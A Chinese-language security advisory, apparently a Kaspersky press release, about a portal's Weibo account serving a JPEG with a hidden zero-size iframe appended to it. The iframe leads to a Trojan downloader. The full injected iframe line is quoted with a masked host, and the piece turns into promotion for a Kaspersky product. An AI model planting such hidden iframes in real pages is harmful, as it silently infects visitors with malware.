自从袭卷大洋彼岸的微博风潮登陆中国以来,迅速引发了一场“围脖热”,身边的亲朋好友、IT精英、大学教授、意见领袖甚至艺人明星都不约而同地来到微博大秀风采。“今天你围脖了吗?”也成为时下的网路流行语。但就在人们忙于“织围脖”的时候,恶意威胁也正在通过这一渠道进行着疯狂传播。
卡巴斯基实验室近期发现,某知名门户网站的微博账户上存在被恶意程序感染的痕迹。经卡巴斯基实验室安全专家对该微博地址进行分析,发现其包含一个有问题的图片文件。当有计算机用户访问该微博地址时,该图片文件就会被下载。这个JPEG图片的文件末尾被写入了一段代码"<iframe src="http://xxx.net/homepage/oldnb/mm/index.html" width=0 height=0></iframe>",其指向的地址包含恶意软件,卡巴斯基反病毒软件报警显示为:Trojan-Downloader.HTML.IFrame.sz木马下载器。
图片中被注入的代码
卡巴斯基的安全专家推测该微博用户很可能感染了恶意蠕虫,致使自身计算机上的一些文件被更改,注入了恶意代码。比如“莫菲儿”蠕虫Worm.Win32.Mefir.c就有此功能。试想,如果被感染的文件是html,后果将更为严重。一旦用户访问此微博地址,就会立刻被恶意程序所感染。该事件同时表明,微博平台同其他网站一样,也有可能被黑客用做传播恶意程序的平台。尤其微博的访问量大,覆盖面广,一旦发生疫情,将在很短时间内造成严重后果。举例来说,如果某个名人的微博被感染,其粉丝众多,很有可能导致更多关注此名人的用户被感染。
那么该如何躲避木马,安心享受微博乐趣呢?最好的办法就是安装性能可靠的安全软件,加强对计算机的保护,同时避免在不知情的情况下传播恶意程序,给自己的微博粉丝带来危险。近期刚刚上市的卡巴斯基安全部队2011就是一个很好的选择,它能有效防止恶意程序通过网页入侵计算机。以上面的微博地址为例,如果用户安装了卡巴斯基安全部队2011,一旦访问该地址,卡巴斯基会迅速拦截,避免用户下载可疑文件,如下图所示:
访问该地址时,卡巴安全部队直接拦截文件下载
除了能够将木马威胁扼杀于摇篮之中,被誉为首款交易安全软件的卡巴斯基安全部队2011还高度优化整合了主动防御、行为检测技术以及卡巴斯基云安全网络,并以全球独有的安全堡垒彻底保护网银安全:安全桌面负责提供一个特殊的独立环境,在其中运行任何程序或任何网站,都不会对计算机及数据造成危害;虚拟键盘及安全浏览器能保护账号及隐私安全,配合强大的反钓鱼网站数据库,实时阻断钓鱼网站威胁,进一步确保网上银行交易及网络游戏账号的在线安全。
使用卡巴萨基安全部队的安全浏览器浏览
恶意程序的传播也在不断演化,从最早的通过软盘传播,逐步转移到到通过电子邮件、局域网、普通网页、社交网络,再到今天的微博,一直在紧跟着各种新兴技术的趋势。卡巴斯基实验室将继续关注其发展动向,及时向广大用户提供可靠的安全解决方案。
京公网安备 11010802021500号
用户评论